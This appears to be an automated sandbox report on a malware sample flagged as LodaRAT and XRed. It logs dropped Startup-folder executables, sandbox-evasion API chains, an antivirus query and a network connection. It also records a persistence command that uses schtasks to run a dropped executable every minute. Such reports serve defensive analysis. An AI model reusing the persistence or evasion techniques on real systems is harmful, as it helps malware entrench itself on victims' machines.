                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Found API chain indicative of sandbox detection
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: threadDelayed 4634Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: foregroundWindowGot 1359Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 6.5 %
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeAPI coverage: 3.8 %
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 3.8 %
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe TID: 7724Thread sleep time: -46340s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1904Thread sleep time: -8040000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8388Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeThread sleep count: Count: 4634 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000007.00000002.3025260757.000000000495E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.3016673741.0000000002C92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.3017946257.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.3016673741.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7720, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7960, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2DD92 GetFileAttributesW,FindFirstFileW,FindClose,7_2_00F2DD92
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F62044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00F62044
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F6219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00F6219F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00F624A9
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F56B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,7_2_00F56B3F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F56E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,7_2_00F56E4A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00F5F350
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_00F5FDD2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5FD47 FindFirstFileW,FindClose,7_2_00F5FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00DB2044
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00DB219F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00DB24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DA6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,16_2_00DA6B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DA6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,16_2_00DA6E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DAF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00DAF350
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DAFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00DAFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7DD92 GetFileAttributesW,FindFirstFileW,FindClose,16_2_00D7DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DAFD47 FindFirstFileW,FindClose,16_2_00DAFD47
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F62044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00F62044
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F6219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00F6219F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00F624A9
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F56B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,23_2_00F56B3F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F56E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,23_2_00F56E4A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00F5F350
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00F5FDD2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2DD92 GetFileAttributesW,FindFirstFileW,FindClose,23_2_00F2DD92
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5FD47 FindFirstFileW,FindClose,23_2_00F5FD47
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00F2E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                              Source: wscript.exe, 00000000.00000002.1768125134.000002235D2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1766377849.000002235D2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1765701349.000002235D2B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4UV
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
                              Source: wscript.exe, 00000000.00000002.1768125134.000002235D2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1766377849.000002235D2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F8E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1765701349.000002235D2B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F8E8000.00000004.00000020.00020000.00000000.sdmp, ._cache_update.exe, 00000007.00000002.3019645896.0000000001708000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: ._cache_update.exe, 00000007.00000002.3019645896.000000000173A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_7-111081
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_7-110062
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_7-107625
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F6703C BlockInput,7_2_00F6703C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F1374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,7_2_00F1374E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F446D0 LoadLibraryExW,GetLastError,LoadLibraryW,6C3C6DE0,6C3C6DE0,6C3C6DE0,6C3C6DE0,6C3C6DE0,IsDebuggerPresent,OutputDebugStringW,7_2_00F446D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00EC30B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,16_2_00EC30B0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F3A937 GetProcessHeap,7_2_00F3A937
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F38E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00F38E3C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F38E19 SetUnhandledExceptionFilter,7_2_00F38E19
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D88E19 SetUnhandledExceptionFilter,16_2_00D88E19
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D88E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00D88E3C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F38E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00F38E3C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F38E19 SetUnhandledExceptionFilter,23_2_00F38E19

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Benign windows process drops PE files
                              Source: C:\Windows\System32\wscript.exeFile created: FGNEBI[1].exe.0.drJump to dropped file
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4BE95 LogonUserW,7_2_00F4BE95
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F1374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,7_2_00F1374E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F54B52 SendInput,keybd_event,7_2_00F54B52
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F57DD5 mouse_event,7_2_00F57DD5
                              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,7_2_00F4B398
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_00F4BE31
                              Source: ._cache_update.exeBinary or memory string: Shell_TrayWnd
                              Source: ._cache_update.exe, 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmp, DELPQB.exe, 00000010.00000002.2013447692.0000000000E0E000.00000040.00000001.01000000.0000000C.sdmp, DELPQB.exe, 00000013.00000002.2040682072.0000000000E0E000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F37254 cpuid 7_2_00F37254
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F340DA GetSystemTimeAsFileTime,__aulldiv,7_2_00F340DA
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F8C146 GetUserNameW,7_2_00F8C146
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F42C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_00F42C3C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00F2E47B
                              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7720, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.wscript.exe.2235fd7e684.0.unpack, type: UNPACKEDPE
